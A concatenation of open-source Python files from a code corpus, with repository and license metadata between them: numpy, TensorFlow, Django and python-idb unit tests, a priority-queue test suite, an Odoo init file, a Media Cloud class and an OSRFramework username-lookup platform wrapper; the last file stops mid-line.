def test_iter_too_large_with_multiindex(): # When a multi index is being tracked, the error is delayed this # checks the delayed error messages and getting below that by # removing an axis. base_size = 2**10 num = 1 while base_size**num < np.iinfo(np.intp).max: num += 1 shape_template = [1, 1] * num arrays = [] for i in range(num): shape = shape_template[:] shape[i * 2] = 2**10 arrays.append(np.empty(shape)) arrays = tuple(arrays) # arrays are now too large to be broadcast. The different modes test # different nditer functionality with or without GIL. 
for mode in range(6): assert_raises(ValueError, test_nditer_too_large, arrays, -1, mode) # but if we do nothing with the nditer, it can be constructed: test_nditer_too_large(arrays, -1, 7) # When an axis is removed, things should work again (half the time): for i in range(num): for mode in range(6): # an axis with size 1024 is removed: test_nditer_too_large(arrays, i*2, mode) # an axis with size 1 is removed: assert_raises(ValueError, test_nditer_too_large, arrays, i*2 + 1, mode) if __name__ == "__main__": run_module_suite()
bsd-3-clause
ptrompeter/data-structures
tests/test_priority.py
1
1333
from src.priority import Priority

# (priority, value) pairs with repeated priorities, used to exercise ordering
# across a mix of priority levels.  Priorities 1, 2 and 5 each appear more
# than once so that FIFO behaviour within a priority level is observable.
TEST_LIST = [
    (2, 1),
    (5, 1),
    (1, 1),
    (2, 2),
    (1, 2),
    (2, 3),
    (5, 2),
    (4, 1),
    (6, 1),
    (8, 1),
    (1, 3),
    (2, 4),
]


def test_pri_push():
    """A single pushed tuple becomes the head of the queue."""
    queue = Priority()
    queue.push((1, 'a'))
    assert queue.plist[0] == (1, 'a')


def test_pri_push1():
    """Equal-priority items keep insertion order: the first in stays at the head."""
    queue = Priority()
    for item in [(3, 'a'), (3, 'b'), (3, 'c'), (3, 'd')]:
        queue.push(item)
    assert queue.plist[0][1] == 'a'


def test_pri_push2():
    """An item with a smaller priority number moves ahead of existing entries."""
    queue = Priority()
    for item in [(3, 'a'), (3, 'b'), (3, 'c'), (3, 'd'), (2, 'a')]:
        queue.push(item)
    assert queue.plist[0] == (2, 'a')


def test_pri_push3():
    """Constructing from a list places the smallest priority at the head."""
    queue = Priority(TEST_LIST)
    assert queue.plist[0][0] == 1


def test_pri_push4():
    """The head after bulk construction is the first item with priority 1."""
    queue = Priority(TEST_LIST)
    assert queue.plist[0] == (1, 1)


def test_pri_pop():
    """Popping once still leaves a priority-1 item at the head (three exist)."""
    queue = Priority(TEST_LIST)
    queue.pop()
    assert queue.plist[0][0] == 1


def test_pri_pop2():
    """Popping twice still leaves the last priority-1 item at the head."""
    queue = Priority(TEST_LIST)
    for _ in range(2):
        queue.pop()
    assert queue.plist[0][0] == 1


def test_pri_pop3():
    """After all three priority-1 items are popped, priority 2 is at the head."""
    queue = Priority(TEST_LIST)
    for _ in range(3):
        queue.pop()
    assert queue.plist[0][0] == 2
mit
rdipietro/tensorflow
tensorflow/python/ops/math_grad_test.py
20
5921
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Python ops defined in math_grad.py."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import tensorflow as tf

# NOTE(review): this file is written against the pre-1.0 TensorFlow API
# (`tf.concat(axis, values)` argument order, `tf.complex_abs`, `test_session`)
# — confirm the target TF version before porting any of these tests.


class SquaredDifferenceOpTest(tf.test.TestCase):
  """Numeric gradient checks for `tf.squared_difference`, incl. broadcasting."""

  def _testGrad(self, left_shape, right_shape):
    """Checks gradients w.r.t. both inputs for the given (broadcastable) shapes.

    The output shape is the larger-rank of the two input shapes, which is the
    broadcast result shape for the shape pairs used in `testGrad` below.
    """

    if len(left_shape) > len(right_shape):
      output_shape = left_shape
    else:
      output_shape = right_shape
    l = np.random.randn(*left_shape)
    r = np.random.randn(*right_shape)

    with self.test_session(use_gpu=True):
      left_tensor = tf.constant(l, shape=left_shape)
      right_tensor = tf.constant(r, shape=right_shape)
      output = tf.squared_difference(left_tensor, right_tensor)
      # Compare the analytic gradient against a finite-difference estimate,
      # seeding the check with the same values used to build the constants.
      left_err = tf.test.compute_gradient_error(left_tensor,
                                                left_shape,
                                                output,
                                                output_shape,
                                                x_init_value=l)
      right_err = tf.test.compute_gradient_error(right_tensor,
                                                 right_shape,
                                                 output,
                                                 output_shape,
                                                 x_init_value=r)
    self.assertLess(left_err, 1e-10)
    self.assertLess(right_err, 1e-10)

  def testGrad(self):
    # Both orderings: left operand broadcast onto right, and vice versa.
    self._testGrad([1, 2, 3, 2], [3, 2])
    self._testGrad([2, 4], [3, 2, 4])


class AbsOpTest(tf.test.TestCase):
  """Gradient checks for `tf.abs` / `tf.complex_abs`, incl. near the origin."""

  def _biasedRandN(self, shape, bias=0.1, sigma=1.0):
    """Returns samples from a normal distribution shifted `bias` away from 0."""
    value = np.random.randn(*shape) * sigma
    # np.sign(value) pushes each sample further from zero by `bias`, so with a
    # positive bias no sample lands near abs()'s non-differentiable point.
    return value + np.sign(value) * bias

  def _testGrad(self, shape, dtype=None, max_error=None, bias=None, sigma=None):
    """Checks the abs gradient for `shape` against a per-call error budget."""
    # Fixed seed keeps the sampled check points (and thus the error) repeatable.
    np.random.seed(7)
    if dtype in (tf.complex64, tf.complex128):
      value = tf.complex(self._biasedRandN(shape, bias=bias, sigma=sigma),
                         self._biasedRandN(shape, bias=bias, sigma=sigma))
    else:
      value = tf.convert_to_tensor(self._biasedRandN(shape, bias=bias),
                                   dtype=dtype)

    with self.test_session(use_gpu=True):
      # Complex inputs need the dedicated complex_abs op in this TF version.
      if dtype in (tf.complex64, tf.complex128):
        output = tf.complex_abs(value)
      else:
        output = tf.abs(value)
      error = tf.test.compute_gradient_error(
          value, shape, output, output.get_shape().as_list())
    self.assertLess(error, max_error)

  def testComplexAbs(self):
    # Bias random test values away from zero to avoid numeric instabilities.
    self._testGrad([3, 3], dtype=tf.float32, max_error=2e-5, bias=0.1,
                   sigma=1.0)
    self._testGrad([3, 3], dtype=tf.complex64, max_error=2e-5, bias=0.1,
                   sigma=1.0)

    # Ensure stability near the pole at zero.
    # The loose 100.0 budget only asserts the check runs without blowing up;
    # accuracy near zero is not expected.
    self._testGrad([3, 3], dtype=tf.float32, max_error=100.0, bias=0.0,
                   sigma=0.1)
    self._testGrad([3, 3], dtype=tf.complex64, max_error=100.0, bias=0.0,
                   sigma=0.1)


class MinOrMaxGradientTest(tf.test.TestCase):
  """Gradient checks for reduce_min/reduce_max when the extremum is tied.

  Both tests concatenate a tensor with itself so every element ties for the
  min/max; the check verifies the gradient is still numerically consistent.
  """

  def testMinGradient(self):
    inputs = tf.constant([1.0], dtype=tf.float32)
    # tf.concat(0, ...) is the old (axis-first) signature.
    outputs = tf.reduce_min(tf.concat(0, [inputs, inputs]))
    with self.test_session():
      # [] output shape: the full reduction yields a scalar.
      error = tf.test.compute_gradient_error(inputs, [1], outputs, [])
      self.assertLess(error, 1e-4)

  def testMaxGradient(self):
    inputs = tf.constant([1.0], dtype=tf.float32)
    outputs = tf.reduce_max(tf.concat(0, [inputs, inputs]))
    with self.test_session():
      error = tf.test.compute_gradient_error(inputs, [1], outputs, [])
      self.assertLess(error, 1e-4)


class SegmentMinOrMaxGradientTest(tf.test.TestCase):
  """Gradient checks for segment_min/segment_max, with and without ties."""

  def testSegmentMinGradient(self):
    data = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32)
    # Two segments: elements 0-1 form segment 0, element 2 forms segment 1.
    segment_ids = tf.constant([0, 0, 1], dtype=tf.int64)
    segment_min = tf.segment_min(data, segment_ids)
    with self.test_session():
      error = tf.test.compute_gradient_error(data, [3], segment_min, [2])
      self.assertLess(error, 1e-4)

  def testSegmentMaxGradient(self):
    data = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32)
    segment_ids = tf.constant([0, 0, 1], dtype=tf.int64)
    segment_max = tf.segment_max(data, segment_ids)
    with self.test_session():
      error = tf.test.compute_gradient_error(data, [3], segment_max, [2])
      self.assertLess(error, 1e-4)

  def testSegmentMinGradientWithTies(self):
    # Duplicating `inputs` makes both elements of the single segment tie,
    # exercising the tie-handling path of the segment_min gradient.
    inputs = tf.constant([1.0], dtype=tf.float32)
    data = tf.concat(0, [inputs, inputs])
    segment_ids = tf.constant([0, 0], dtype=tf.int64)
    segment_min = tf.segment_min(data, segment_ids)
    with self.test_session():
      error = tf.test.compute_gradient_error(inputs, [1], segment_min, [1])
      self.assertLess(error, 1e-4)

  def testSegmentMaxGradientWithTies(self):
    inputs = tf.constant([1.0], dtype=tf.float32)
    data = tf.concat(0, [inputs, inputs])
    segment_ids = tf.constant([0, 0], dtype=tf.int64)
    segment_max = tf.segment_max(data, segment_ids)
    with self.test_session():
      error = tf.test.compute_gradient_error(inputs, [1], segment_max, [1])
      self.assertLess(error, 1e-4)


if __name__ == "__main__":
  tf.test.main()
apache-2.0
sodexis/odoo
addons/stock/wizard/__init__.py
323
1149
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import stock_move import stock_return_picking import stock_change_product_qty import make_procurement_product import orderpoint_procurement import stock_transfer_details
agpl-3.0
berkmancenter/mediacloud
apps/extract-and-vector/src/python/extract_and_vector/dbi/stories/extractor_arguments.py
1
2882
from mediawords.util.perl import decode_object_from_bytes_if_needed # MC_REWRITE_TO_PYTHON: rename back to ExtractorArguments after rewrite class PyExtractorArguments(object): """Arguments to process_extracted_story() that define how story is to be extracted.""" # MC_REWRITE_TO_PYTHON: remake into data class / properties after Python rewrite __slots__ = [ '__no_dedup_sentences', '__no_delete', '__no_tag_extractor_version', '__use_cache', '__use_existing', ] def __init__(self, no_dedup_sentences: bool = False, no_delete: bool = False, no_tag_extractor_version: bool = False, use_cache: bool = False, use_existing: bool = False): """Constructor.""" if isinstance(no_dedup_sentences, bytes): no_dedup_sentences = decode_object_from_bytes_if_needed(no_dedup_sentences) if isinstance(no_delete, bytes): no_delete = decode_object_from_bytes_if_needed(no_delete) if isinstance(no_tag_extractor_version, bytes): no_tag_extractor_version = decode_object_from_bytes_if_needed(no_tag_extractor_version) if isinstance(use_cache, bytes): use_cache = decode_object_from_bytes_if_needed(use_cache) if isinstance(use_existing, bytes): use_existing = decode_object_from_bytes_if_needed(use_existing) # MC_REWRITE_TO_PYTHON: remove weird casts after Python rewrite no_dedup_sentences = bool(int(no_dedup_sentences)) no_delete = bool(int(no_delete)) no_tag_extractor_version = bool(int(no_tag_extractor_version)) use_cache = bool(int(use_cache)) use_existing = bool(int(use_existing)) self.__no_dedup_sentences = no_dedup_sentences self.__no_delete = no_delete self.__no_tag_extractor_version = no_tag_extractor_version self.__use_cache = use_cache self.__use_existing = use_existing def no_dedup_sentences(self) -> bool: """Return True if sentences don't have to be deduplicated.""" return self.__no_dedup_sentences def no_delete(self) -> bool: """Return True if old sentences don't have to be deleted before inserting new ones.""" return self.__no_delete def no_tag_extractor_version(self) -> bool: """Return 
True if tagging story with extractor's version is to be skipped.""" return self.__no_tag_extractor_version def use_cache(self) -> bool: """Return True if the extractor should return a cached extractor result (if one is present in cache).""" return self.__use_cache def use_existing(self) -> bool: """Return True if extraction is to be skipped if the extracted text already exists in "download_texts".""" return self.__use_existing
agpl-3.0
i3visio/osrframework
osrframework/wrappers/myeloma.py
1
3879
################################################################################ # # Copyright 2015-2020 Félix Brezo and Yaiza Rubio # # This program is part of OSRFramework. You can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ################################################################################ __author__ = "Felix Brezo, Yaiza Rubio <contacto@i3visio.com>" __version__ = "2.0" from osrframework.utils.platforms import Platform class Myeloma(Platform): """A <Platform> object for Myeloma""" def __init__(self): self.platformName = "Myeloma" self.tags = ["opinions"] ######################## # Defining valid modes # ######################## self.isValidMode = {} self.isValidMode["phonefy"] = False self.isValidMode["usufy"] = True self.isValidMode["searchfy"] = False ###################################### # Search URL for the different modes # ###################################### # Strings with the URL for each and every mode self.url = {} #self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>" self.url["usufy"] = "http://forum.myeloma.org.uk/members/" + "<usufy>" #self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>" ###################################### # Whether the user needs credentials # ###################################### self.needsCredentials = {} #self.needsCredentials["phonefy"] = False self.needsCredentials["usufy"] = False #self.needsCredentials["searchfy"] = 
False ################# # Valid queries # ################# # Strings that will imply that the query number is not appearing self.validQuery = {} # The regular expression '.+' will match any query. #self.validQuery["phonefy"] = ".*" self.validQuery["usufy"] = ".+" #self.validQuery["searchfy"] = ".*" ################### # Not_found clues # ################### # Strings that will imply that the query number is not appearing self.notFoundText = {} #self.notFoundText["phonefy"] = [] self.notFoundText["usufy"] = ["error404 no-js"] #self.notFoundText["searchfy"] = [] ######################### # Fields to be searched # ######################### self.fieldsRegExp = {} # Definition of regular expressions to be searched in phonefy mode #self.fieldsRegExp["phonefy"] = {} # Example of fields: #self.fieldsRegExp["phonefy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in usufy mode self.fieldsRegExp["usufy"] = {} # Example of fields: #self.fieldsRegExp["usufy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in searchfy mode #self.fieldsRegExp["searchfy"] = {} # Example of fields: #self.fieldsRegExp["searchfy"]["i3visio.location"] = "" ################ # Fields found # ################ # This attribute will be feeded when running the program. self.foundFields = {}
agpl-3.0
tayfun/django
tests/template_tests/filter_tests/test_filesizeformat.py
306
2495
from __future__ import unicode_literals from django.template.defaultfilters import filesizeformat from django.test import SimpleTestCase from django.utils import translation class FunctionTests(SimpleTestCase): def test_formats(self): self.assertEqual(filesizeformat(1023), '1023\xa0bytes') self.assertEqual(filesizeformat(1024), '1.0\xa0KB') self.assertEqual(filesizeformat(10 * 1024), '10.0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024 - 1), '1024.0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024), '1.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 50), '50.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 - 1), '1024.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024), '1.0\xa0GB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024), '1.0\xa0TB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024), '1.0\xa0PB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024 * 2000), '2000.0\xa0PB') self.assertEqual(filesizeformat(complex(1, -1)), '0\xa0bytes') self.assertEqual(filesizeformat(""), '0\xa0bytes') self.assertEqual(filesizeformat("\N{GREEK SMALL LETTER ALPHA}"), '0\xa0bytes') def test_localized_formats(self): with self.settings(USE_L10N=True), translation.override('de'): self.assertEqual(filesizeformat(1023), '1023\xa0Bytes') self.assertEqual(filesizeformat(1024), '1,0\xa0KB') self.assertEqual(filesizeformat(10 * 1024), '10,0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024 - 1), '1024,0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024), '1,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 50), '50,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 - 1), '1024,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024), '1,0\xa0GB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024), '1,0\xa0TB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024), '1,0\xa0PB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024 * 2000), 
'2000,0\xa0PB') self.assertEqual(filesizeformat(complex(1, -1)), '0\xa0Bytes') self.assertEqual(filesizeformat(""), '0\xa0Bytes') self.assertEqual(filesizeformat("\N{GREEK SMALL LETTER ALPHA}"), '0\xa0Bytes')
bsd-3-clause
williballenthin/python-idb
tests/test_idb.py
1
24692
import binascii import idb.fileformat import idb.netnode from fixtures import * def h2b(somehex): """ convert the given hex string into bytes. binascii.unhexlify is many more characters to type :-). """ return binascii.unhexlify(somehex) def b2h(somebytes): """ convert the given bytes into a hex *string*. binascii.hexlify returns a bytes, which is slightly annoying. also, its many more characters to type. """ return binascii.hexlify(somebytes).decode("ascii") def h(number): """ convert a number to a hex representation, with no leading '0x'. Example:: assert h(16) == '10' assert hex(16) == '0x10' """ return "%02x" % number @kern32_test( [(695, 32, 4), (695, 64, 8), (700, 32, 4), (700, 64, 8),] ) def test_wordsize(kernel32_idb, version, bitness, expected): assert kernel32_idb.wordsize == expected @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_validate(kernel32_idb, version, bitness, expected): # should be no ValueErrors here. assert kernel32_idb.validate() is True def do_test_compressed(db): for section in db.sections: if section is None: continue assert section.header.is_compressed is True assert ( section.header.compression_method == idb.fileformat.COMPRESSION_METHOD.ZLIB ) # should be no ValueErrors here. 
assert db.validate() is True def test_compressed(compressed_idb, compressed_i64): do_test_compressed(compressed_idb) do_test_compressed(compressed_i64) @kern32_test( [(695, 32, b"IDA1"), (695, 64, b"IDA2"), (700, 32, b"IDA1"), (700, 64, b"IDA2"),] ) def test_header_magic(kernel32_idb, version, bitness, expected): assert kernel32_idb.header.signature == expected assert kernel32_idb.header.sig2 == 0xAABBCCDD @kern32_test( [(695, 32, 0x2000), (695, 64, 0x2000), (700, 32, 0x2000), (700, 64, 0x2000),] ) def test_id0_page_size(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.page_size == expected @kern32_test( [(695, 32, 0x1), (695, 64, 0x1), (700, 32, 0x1), (700, 64, 0x1),] ) def test_id0_root_page(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.root_page == expected @kern32_test( [ # collected empirically (695, 32, 1592), (695, 64, 1979), (700, 32, 1566), (700, 64, 1884), ] ) def test_id0_page_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.page_count == expected @kern32_test( [ # collected empirically (695, 32, 422747), (695, 64, 422753), (700, 32, 426644), (700, 64, 426647), ] ) def test_id0_record_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.record_count == expected @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_id0_root_entries(kernel32_idb, version, bitness, expected): """ Args: expected: ignored """ for entry in kernel32_idb.id0.get_page(kernel32_idb.id0.root_page).get_entries(): assert entry.key is not None @kern32_test( [ (695, 32, "24204d4158204c494e4b"), (695, 64, "24204d4158204c494e4b"), (700, 32, "24204d4158204c494e4b"), (700, 64, "24204d4158204c494e4b"), ] ) def test_cursor_min(kernel32_idb, version, bitness, expected): # test cursor movement from min key # min leaf keys: # 24204d4158204c494e4b # 24204d4158204e4f4445 # 24204e45542044455343 # 2e0000000044689ae208 minkey = kernel32_idb.id0.get_min().key assert minkey == 
h2b(expected) cursor = kernel32_idb.id0.find(minkey) cursor.next() assert b2h(cursor.key) == "24204d4158204e4f4445" cursor.prev() assert b2h(cursor.key) == "24204d4158204c494e4b" with pytest.raises(IndexError): cursor.prev() @kern32_test( [ (695, 32, "4e776373737472"), (695, 64, "4e776373737472"), (700, 32, "4e776373737472"), (700, 64, "4e776373737472"), ] ) def test_cursor_max(kernel32_idb, version, bitness, expected): # test cursor movement from max key # max leaf keys: # 4e7763736e636d70 # 4e7763736e637079 # 4e7763736e6370795f73 # 4e77637372636872 # 4e776373737472 maxkey = kernel32_idb.id0.get_max().key assert maxkey == h2b(expected) cursor = kernel32_idb.id0.find(maxkey) cursor.prev() assert b2h(cursor.key) == "4e77637372636872" cursor.next() assert b2h(cursor.key) == "4e776373737472" with pytest.raises(IndexError): cursor.next() @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match1(kernel32_idb, version, bitness, expected): # this is found in the root node, first index key = h2b("2e6892663778689c4fb7") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "13" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match2(kernel32_idb, version, bitness, expected): # this is found in the second level, third index key = h2b("2e689017765300000009") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test( [ (695, 32, "24204636383931344133462e6c705375624b6579"), (700, 32, "24204636383931344132452e6c705265736572766564"), ] ) def test_find_exact_match3(kernel32_idb, version, bitness, expected): # this is found in the root node, last index. 
key = h2b("2eff001bc44e") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == expected @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match4(kernel32_idb, version, bitness, expected): # this is found on a leaf node, first index key = h2b("2e6890142c5300001000") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "01080709" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match5(kernel32_idb, version, bitness, expected): # this is found on a leaf node, fourth index key = h2b("2e689a288c530000000a") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match6(kernel32_idb, version, bitness, expected): # this is found on a leaf node, last index key = h2b("2e6890157f5300000009") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test() def test_find_exact_match_min(kernel32_idb, version, bitness, expected): minkey = h2b("24204d4158204c494e4b") assert kernel32_idb.id0.find(minkey).key == minkey @kern32_test() def test_find_exact_match_max(kernel32_idb, version, bitness, expected): if 500 < version <= 700: maxkey = h2b("4e776373737472") assert kernel32_idb.id0.find(maxkey).key == maxkey @kern32_test() def test_find_exact_match_error(kernel32_idb, version, bitness, expected): # check our error handling with pytest.raises(KeyError): kernel32_idb.id0.find(b"does not exist!") @kern32_test([(695, 32, None)]) def test_find_prefix(kernel32_idb, version, bitness, expected): # nodeid: ff000006 ($fixups) fixup_nodeid = "2eff000006" key = h2b(fixup_nodeid) # the first match is the N (name) tag cursor = kernel32_idb.id0.find_prefix(key) assert b2h(cursor.key) == fixup_nodeid + h(ord("N")) # nodeid: ff000006 ($fixups) tag: S supvals = fixup_nodeid + h(ord("S")) key = h2b(supvals) # the 
first match is for index 0x68901025 cursor = kernel32_idb.id0.find_prefix(key) assert b2h(cursor.key) == fixup_nodeid + h(ord("S")) + "68901025" with pytest.raises(KeyError): cursor = kernel32_idb.id0.find_prefix(b"does not exist") @kern32_test() def test_find_prefix2(kernel32_idb, version, bitness, expected): """ this test is derived from some issues encountered while doing import analysis. ultimately, we're checking prefix matching when the first match is found in a branch node. """ impnn = idb.netnode.Netnode(kernel32_idb, "$ imports") expected_alts = list(range(0x30)) expected_alts.append(kernel32_idb.uint(-1)) assert list(impnn.alts()) == expected_alts assert list(impnn.sups()) == list(range(0x30)) # capture the number of supvals in each netnode referenced from the import netnode dist = [] for alt in impnn.alts(): if alt == kernel32_idb.uint(-1): break ref = idb.netnode.as_uint(impnn.get_val(alt, tag="A")) nn = idb.netnode.Netnode(kernel32_idb, ref) dist.append((alt, len(list(nn.sups())))) # this distribution was collected empirically. # the import analysis is correct (verified in IDA), so by extension, this should be correct as well. assert dist == [ (0, 4), (1, 388), (2, 77), (3, 50), (4, 42), (5, 13), (6, 28), (7, 4), (8, 33), (9, 68), (10, 1), (11, 9), (12, 1), (13, 7), (14, 1), (15, 24), (16, 9), (17, 6), (18, 26), (19, 9), (20, 54), (21, 24), (22, 8), (23, 9), (24, 7), (25, 5), (26, 1), (27, 2), (28, 26), (29, 1), (30, 18), (31, 5), (32, 3), (33, 2), (34, 3), (35, 6), (36, 11), (37, 11), (38, 5), (39, 6), (40, 11), (41, 7), (42, 10), (43, 14), (44, 38), (45, 16), (46, 6), (47, 7), ] @kern32_test([(695, 32, None)]) def test_cursor_easy_leaf(kernel32_idb, version, bitness, expected): # this is found on a leaf, second to last index. 
# here's the surrounding layout: # # 00:00: 2eff00002253689cc95b = ff689cc95b40ff8000c00bd30201 # > 00:01: 2eff00002253689cc99b = ff689cc99b32ff8000c00be35101 # 00:00: 2eff00002253689cc9cd = ff689cc9cd2bff8000c00be12f01 key = h2b("2eff00002253689cc99b") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689cc9cd" cursor.prev() cursor.prev() assert b2h(cursor.key) == "2eff00002253689cc95b" @kern32_test([(695, 32, None)]) def test_cursor_branch(kernel32_idb, version, bitness, expected): # starting at a key that is found in a branch node, test next and prev. # these should traverse to leaf nodes and pick the min/max entries, respectively. # # 576 contents (branch): # ... # 000638: 2eff00002253689b9535 = ff689b953573ff441098aa0c040c16000000000000 # > 000639: 2eff00002253689bea8e = ff689bea8e8257ff8000c00aa2c601 # 00000e: 2eff00002253689ccaf1 = ff689ccaf113ff8000c00be25301 # ... # # 638 contents (leaf): # 00:00: 2eff00002253689b95db = ff689b95db54ff441098ad08040c14000000000000 # 00:01: 2eff00002253689b9665 = ff689b96655bff441098b008040815000000000000 # 00:00: 2eff00002253689b970f = ff689b970f808bff441098b30804141f000000000000 # ... # 00:01: 2eff00002253689be79b = ff689be79b1bff8000c00a9d4b01 # 00:00: 2eff00002253689be7b6 = ff689be7b68270ff8000c00af6a101 # > 00:00: 2eff00002253689bea26 = ff689bea2668ff8000c00a9f4301 # # # 639 contents (leaf): # > 00:00: 2eff00002253689bece5 = ff689bece514ff8000c00bc6b701 # 00:00: 2eff00002253689becf9 = ff689becf942ff8000c008cf9e01 # 00:00: 2eff00002253689bed3b = ff689bed3b42ff8000c0090b9c01 # ... 
# 00:00: 2eff00002253689cc95b = ff689cc95b40ff8000c00bd30201 # 00:01: 2eff00002253689cc99b = ff689cc99b32ff8000c00be35101 # 00:00: 2eff00002253689cc9cd = ff689cc9cd2bff8000c00be12f01 key = h2b("2eff00002253689bea8e") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689bece5" key = h2b("2eff00002253689bea8e") cursor = kernel32_idb.id0.find(key) cursor.prev() assert b2h(cursor.key) == "2eff00002253689bea26" @kern32_test([(695, 32, None)]) def test_cursor_complex_leaf_next(kernel32_idb, version, bitness, expected): # see the scenario in `test_cursor_branch`. key = h2b("2eff00002253689bea26") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689bea8e" @kern32_test([(695, 32, None)]) def test_cursor_complex_leaf_prev(kernel32_idb, version, bitness, expected): # see the scenario in `test_cursor_branch`. key = h2b("2eff00002253689bece5") cursor = kernel32_idb.id0.find(key) cursor.prev() assert b2h(cursor.key) == "2eff00002253689bea8e" @pytest.mark.slow @kern32_test() def test_cursor_enum_all_asc(kernel32_idb, version, bitness, expected): minkey = kernel32_idb.id0.get_min().key cursor = kernel32_idb.id0.find(minkey) count = 1 while True: try: cursor.next() except IndexError: break count += 1 assert kernel32_idb.id0.record_count == count @pytest.mark.slow @kern32_test() def test_cursor_enum_all_desc(kernel32_idb, version, bitness, expected): maxkey = kernel32_idb.id0.get_max().key cursor = kernel32_idb.id0.find(maxkey) count = 1 while True: try: cursor.prev() except IndexError: break count += 1 assert kernel32_idb.id0.record_count == count @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_id1(kernel32_idb, version, bitness, expected): id1 = kernel32_idb.id1 segments = id1.segments # collected empirically assert len(segments) == 2 for segment in segments: assert segment.bounds.start < segment.bounds.end assert segments[0].bounds.start == 0x68901000 
assert segments[1].bounds.start == 0x689DD000 assert id1.get_segment(0x68901000).bounds.start == 0x68901000 assert id1.get_segment(0x68901001).bounds.start == 0x68901000 assert id1.get_segment(0x689DC000 - 1).bounds.start == 0x68901000 assert id1.get_next_segment(0x68901000).bounds.start == 0x689DD000 assert id1.get_flags(0x68901000) == 0x2590 def test_id1_2(elf_idb): assert list(map(lambda s: s.offset, elf_idb.id1.segments)) == [ 0x0, 0x8C, 0x1CEC, 0x47E4C, 0x7382C, 0x7385C, 0x73F9C, ] @kern32_test( [ # collected empirically (695, 32, 14252), (695, 64, 14252), (700, 32, 14247), (700, 64, 14247), ] ) def test_nam_name_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.nam.name_count == expected @kern32_test( [ # collected empirically (695, 32, 8), (695, 64, 15), (700, 32, 8), (700, 64, 15), ] ) def test_nam_page_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.nam.page_count == expected nam = kernel32_idb.nam if bitness == 32: assert nam.name_count < len(nam.buffer) elif bitness == 64: assert nam.name_count < len(nam.buffer) @kern32_test( [ # collected empirically (695, 32, 14252), (695, 64, 14252), (700, 32, 14247), (700, 64, 14247), ] ) def test_nam_names(kernel32_idb, version, bitness, expected): names = kernel32_idb.nam.names() assert 